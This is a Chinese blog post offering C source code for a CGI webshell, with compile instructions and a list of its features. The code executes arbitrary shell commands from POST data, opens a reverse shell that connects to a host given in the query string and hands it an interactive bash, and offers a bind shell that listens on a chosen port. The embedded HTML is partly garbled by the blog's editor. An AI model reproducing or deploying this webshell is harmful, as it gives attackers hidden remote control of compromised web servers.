Linux C实现cgi shell

3050阅读 0评论2015-02-03 linuxnerd
分类:C/C++

C实现的cgi webshell


点击(此处)折叠或打开

  1. #include <stdio.h>
  2. #include <stdio.h>
  3. #include <string.h>
  4. #include <unistd.h>
  5. #include <stdlib.h>
  6. #include <sys/types.h>
  7. #include <sys/socket.h>
  8. #include <netinet/in.h>
  9. #include <arpa/inet.h>
  10. #include <netdb.h>
  11. #include <signal.h>
  12.  

  14.  
  15. struct get_data {
  16.     char key[100];
  17.     char value[100];
  18. };
  19.  
  20.  
  21. void exec_cmd(void){
  22.     printf("Content-type:text/html\n\n");
  23.     FILE *command;
  24.     int size = atoi(getenv("CONTENT_LENGTH"));
  25.     if(size > 1500) {
  26.         printf("Error> Post Data is very big");
  27.         exit(0);
  28.     }
  29.     char *buffer = malloc(size+1);
  30.     fread(buffer,1,size,stdin);
  31.     command = popen(buffer,"r");
  32.     char caracter;
  33.  
  34.     while((caracter = fgetc(command))){
  35.         if(caracter == EOF) break;
  36.         printf("%c",caracter);
  37.     }
  38.  
  39.     pclose(command);
  40.     free(buffer);
  41.     exit(0);
  42. }
  43.  
  44. int error(char *err){
  45.     perror(err);
  46.     exit(EXIT_FAILURE);
  47. }
  48.  
  49. void parser_get(void){
  50.     printf("Content-type:text/html\n\n");
  51.  
  52.     struct get_data *s;
  53.     char *GET = (char *)getenv("QUERY_STRING");
  54.     int i,number_of_get = 0,size_get = strlen(GET);
  55.  
  56.     if(strlen(GET) > 100)
  57.         exit(0);
  58.  
  59.     s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data));
  60.  
  61.     int element = 0;
  62.     int positionA = 0;
  63.     int positionB = 0;
  64.     int id = 0;
  65.  
  66.     for(i=0;i<size_get;i++){
  67.         if(GET[i] == '='){
  68.             id = 1;
  69.             s[element].key[positionA] = '\0';
  70.             positionB = 0;
  71.             continue;
  72.         }
  73.  
  74.         if(GET[i] == '&'){
  75.             id = 0;
  76.             s[element].key[positionA] = '\0';
  77.             s[element].value[positionB] = '\0';
  78.             positionA = 0;
  79.             positionB = 0;
  80.             element++;
  81.             continue;
  82.         }
  83.  
  84.         if(id==0){
  85.             s[element].key[positionA] = GET[i];
  86.             positionA++;
  87.         }
  88.  
  89.         if(id==1){
  90.             s[element].value[positionB] = GET[i];
  91.             positionB++;
  92.         }
  93.  
  94.         if(i == size_get-1 && GET[size_get-1] != '&'){
  95.             s[element].key[positionA] = '\0';
  96.             s[element].value[positionB] = '\0';
  97.             element++;
  98.             continue;
  99.         }
  100.  
  101.  
  102.     }
  103.  
  104.     char *host_x = (char *)malloc(100);
  105.     host_x = NULL;
  106.     char *type_x = (char *)malloc(100);
  107.     type_x = NULL;
  108.     int port_x = 0;
  109.  
  110.     for(i=0;i<element;i++){
  111.         if(strcmp(s[i].key,"type")==0)
  112.             type_x = s[i].value;
  113.         else if(strcmp(s[i].key,"host")==0)
  114.             host_x = s[i].value;
  115.         else if(strcmp(s[i].key,"port")==0)
  116.             port_x = atoi(s[i].value);
  117.     }
  118.  
  119.     free(s);
  120.  
  121.     if(type_x == NULL){
  122.         free(type_x);
  123.         free(host_x);
  124.         exit(0);
  125.     }
  126.  
  127.     if( (strcmp(type_x,"")==0) || port_x <= 0 || port_x > 65535){
  128.         printf("Something is wrong ... !!!");
  129.         free(type_x);
  130.         free(host_x);
  131.         exit(0);
  132.     }
  133.  
  134.     if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){
  135.         printf("You must specify a target host ...");
  136.         free(type_x);
  137.         free(host_x);
  138.         exit(0);
  139.     }
  140.  
  141.     if(strcmp(type_x,"reverse") == 0){
  142.         struct sockaddr_in addr;
  143.         int msocket;
  144.         msocket = socket(AF_INET,SOCK_STREAM,0);
  145.  
  146.         if(msocket < 0){
  147.             printf("Fail to create socket");
  148.             free(host_x);
  149.             free(type_x);
  150.             exit(0);
  151.         }
  152.  
  153.         addr.sin_family = AF_INET;
  154.         addr.sin_port = htons(port_x);
  155.         addr.sin_addr.s_addr = inet_addr(host_x);
  156.  
  157.         memset(&addr.sin_zero,0,sizeof(addr.sin_zero));
  158.  
  159.         if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){
  160.             printf("Fail to connect\n");
  161.             free(host_x);
  162.             free(type_x);
  163.             exit(0);
  164.         }
  165.  
  166.         printf("Connect with sucess !!!\n");
  167.  
  168.         if(fork() == 0){
  169.             close(0); close(1); close(2);
  170.             dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2);
  171.             execl("/bin/bash","bash","-i", (char *)0);
  172.             close(msocket);
  173.             exit(0);
  174.         }
  175.  
  176.         free(host_x);
  177.         free(type_x);
  178.         exit(0);
  179.     } else if (strcmp(type_x,"bind")==0) {
  180.  
  181.         int my_socket, cli_socket;
  182.         struct sockaddr_in server_addr,cli_addr;
  183.  
  184.         if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  185.             printf("Fail to create socket");
  186.             exit(1);
  187.         }
  188.  
  189.         server_addr.sin_family = AF_INET;
  190.         server_addr.sin_port = htons(port_x);
  191.         server_addr.sin_addr.s_addr = INADDR_ANY;
  192.         bzero(&(server_addr.sin_zero), 8);
  193.  
  194.         int optval = 1;
  195.         setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);
  196.  
  197.  
  198.         if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){
  199.             printf("Fail to bind");
  200.             free(host_x);
  201.             free(type_x);
  202.             exit(1);
  203.         }
  204.  
  205.         if (listen(my_socket, 1) < 0){
  206.             printf("Fail to listen");
  207.             free(host_x);
  208.             free(type_x);
  209.             exit(1);
  210.         } else {
  211.             printf("Listen on port %d\n",port_x);
  212.         }
  213.  
  214.         if(fork() == 0){
  215.             socklen_t tamanho = sizeof(struct sockaddr_in);
  216.  
  217.             if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){
  218.                 exit(0);
  219.  
  220.             }
  221.  
  222.             close(0); close(1); close(2);
  223.             dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2);
  224.  
  225.             execl("/bin/bash","bash","-i",(char *)0);
  226.             close(cli_socket);
  227.  
  228.         }
  229.  
  230.     }
  231.     free(host_x);
  232.     free(type_x);
  233.     exit(0);
  234. }
  235.  
  236. void load_css_js(void){
  237. printf("\n\
  238. \n\
  239. ");
  240.  
  241. }
  242.  
  243. int main(void){
  244.     if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd();
  245.     if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get();
  246.     printf("Content-type:text/html\n\n");
  247.  
  248.     printf("\n");
  249.     printf("\t\n\tContent-type\" content=\"text/html;charset=UTF-8\">\n");
  250.     printf("\t\t C CGI SHELL =D \n");
  251.     load_css_js();
  252.     printf("\n\t\n");
  253.     printf("\t\n");
  254. printf(" \n\
  255.     
    page-wrap\">\n\
  256.     

    C - CGI SHELL

    C0d3r: webshell | REVERSE/BIND
    \n\
  257.     
    \n\
  258.     text\" style=\"width:300px;\" id=\"xxx\" onkeyup=\"if(event.keyCode == 13) document.getElementById('lol').click()\">\n\
  259.     " type=\"button\" value=\"Run Command\" onclick=\"exec_cmd()\">br/>\n\
  260.     
    " id='result'>
以上为部分代码(CU的富文本编辑器有些问题)


编译:
gcc shell.c -o shell.cgi

功能:
1.反弹获得shell(target作为客户端)


2.监听获得shell(target作为服务端)


3.命令行执行

上一篇:PAM模块的backdoor实现与分析
下一篇:没有了